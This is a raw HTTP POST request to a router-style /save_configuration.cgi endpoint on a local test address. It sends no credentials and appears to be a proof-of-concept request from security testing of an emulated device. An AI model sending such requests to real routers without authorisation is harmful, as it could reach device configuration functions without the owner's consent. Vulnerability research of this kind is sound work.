POST /save_configuration.cgi HTTP/1.1
Host: 172.17.0.2
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:107.0) Gecko/20100101 Firefox/107.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: multipart/form-data; boundary=---------------------------397338530742219497553263194096
Content-Length: 350
Origin: http://172.17.0.2
Connection: close
Referer: http://172.17.0.2/tools_system.asp
Upgrade-Insecure-Requests: 1

-----------------------------397338530742219497553263194096
Content-Disposition: form-data; name="html_response_page"

tools_system.asp
-----------------------------397338530742219497553263194096
Content-Disposition: form-data; name="html_response_return_page"

tools_system.asp
-----------------------------397338530742219497553263194096--
